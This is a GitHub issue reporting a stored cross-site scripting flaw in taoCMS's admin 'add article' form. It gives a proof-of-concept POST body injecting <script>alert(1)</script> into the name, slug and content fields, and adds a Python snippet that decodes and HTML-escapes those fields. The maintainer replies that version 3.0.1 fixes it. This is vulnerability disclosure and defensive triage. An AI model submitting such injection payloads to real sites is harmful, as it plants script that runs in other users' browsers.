taogogo / taocms

taoCMS is an incredible tiny CMS (Content Management System), written in PHP and supporting MySQL/SQLite as the database (MIT License)

There is a storage type cross-site scripting attack at "Management column" (Column administrator authority) #3

Closed ddddbhm closed 3 years ago

ddddbhm commented 3 years ago

First, we enter the background and use the column administrator admin1 we created:

[Image 1]

Let's click "add article" on the left:

http://target/admin/admin.php?action=frame&ctrl=iframes

[Image 2]

Wow!

[Image 3]

POC:

/admin/admin.php postData:name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat=0&content=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B&slug=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=&link=&thumbpic=&orders=&status=1&action=cms&ctrl=save&id=&Submit=%E6%8F%90%E4%BA%A4
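
An added triage example, not part of the original issue or of taoCMS: it URL-decodes the PoC body above and shows that `name` and `slug` arrive as raw `<script>` markup while `content` arrives already entity-encoded, then applies the HTML encoding a stored value needs when it is written into a page. The function names are hypothetical, and taoCMS's own rendering code is not shown on this page.

```python
import html
from urllib.parse import parse_qsl

# POST body copied from the PoC in the issue (the "postData:" label removed).
POC_BODY = (
    "name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat=0"
    "&content=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B"
    "&slug=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=&link=&thumbpic="
    "&orders=&status=1&action=cms&ctrl=save&id=&Submit=%E6%8F%90%E4%BA%A4"
)


def decode_fields(body):
    """URL-decode a form body, keeping empty fields such as tags= and id=."""
    return dict(parse_qsl(body, keep_blank_values=True, encoding="utf-8"))


def classify(value):
    """Describe the form in which a decoded field value reaches the server."""
    if any(ch in "<>\"'" for ch in value):
        return "raw-markup"        # becomes live HTML unless encoded on output
    if html.unescape(value) != value:
        return "entity-encoded"    # client already sent &lt; / &gt; style text
    return "plain"


def triage(body):
    """Map each field name to its classification."""
    return {name: classify(value) for name, value in decode_fields(body).items()}


def encode_for_html(value):
    """Encode a stored value for HTML text or a quoted attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    fields = decode_fields(POC_BODY)
    for name, kind in triage(POC_BODY).items():
        if kind == "raw-markup":
            print(f"{name}: {kind}; encoded output: {encode_for_html(fields[name])}")
        elif kind == "entity-encoded":
            print(f"{name}: {kind}; stored text: {fields[name]}")
```

The classification only describes what the request carries; which of these fields the admin pages echo without encoding has to be confirmed against the application's templates.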

taogogo commented 3 years ago

3.0.1 fixed, thanks for your contribution